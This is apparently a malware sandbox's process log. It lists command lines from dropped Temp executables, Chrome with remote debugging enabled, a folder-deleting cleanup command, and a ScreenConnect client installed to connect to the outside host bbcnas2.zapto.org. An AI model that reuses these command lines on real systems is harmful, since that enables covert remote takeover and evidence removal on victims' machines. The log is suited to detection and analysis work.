"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2264 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1100 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3300 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3324 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1384 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe
"C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe"
C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe
"C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 508
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3720 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe
"C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\noh47" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 11
C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"
C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 504
C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe
"C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 240
C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe
"C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 892781CF53AD49D0DBD7DC387AB6DC73 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIDA87.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259513060 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000060" "0000000000000560"
C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe
"C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3B85572E27B2AAB122B7715E5ED4A815
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A31261E18EDE542AF332C0E7A64EC7F4 M Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=e228137a-1681-43c0-a833-6e8e39d6fe60&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="
C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "4b9ddc8f-c653-45ea-9c82-46ca4caff651" "User"
C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "08e856cc-7b68-40ec-973c-2bb46bb1d75f" "System"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
